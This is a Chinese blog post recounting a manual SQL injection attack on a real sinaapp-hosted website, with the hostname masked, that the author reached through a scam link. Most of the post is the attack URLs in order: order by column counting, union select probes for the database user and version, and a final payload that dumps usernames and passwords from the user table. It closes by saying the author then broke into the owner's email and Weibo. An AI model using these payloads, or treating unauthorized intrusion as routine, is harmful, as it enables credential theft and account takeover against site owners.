【原创】SQL手工注入sinaapp

手头的事做完了，看到朋友空间转个骗人抽奖的网站，不知道怎么的就跳转到sinaapp网站下了然后旁注到这个站，记录一下很少能遇见手工的注入的站了。

http://xxx.sinaapp.com/species_show.php?id=1%20order%20by%2018

经过order by的测试为18个字段。

http://xxx.sinaapp.com/species_show.php?id=1%20order%20by%2019

输入19的时候就会报错，接着就看看支不支持联合查询了。

（告诉大家一个小技巧，如果union后没有返回数据就把前面的参数id改成9999让原本的数据没办法返回就会返回我们输入的值了）

http://xxx.sinaapp.com/species_show.php?id=9999%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18

http://xxx.sinaapp.com/species_show.php?id=9999%20union%20select%201,user(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18

SAE肯定不是root了

http://xxx.sinaapp.com/species_show.php?id=9999%20union%20select%201,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18

数据库版本:

直接出账号密码吧。

http://xxx.sinaapp.com/species_show.php?id=9999%20and%201=2%20union%20select%201,concat(name),concat(password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18%20from%20user%20limit%200,1-- 

接着就是找到联系方式进邮箱

社进微博

就到这里，后期如果有继续深入会继续写随笔，跟大家分享。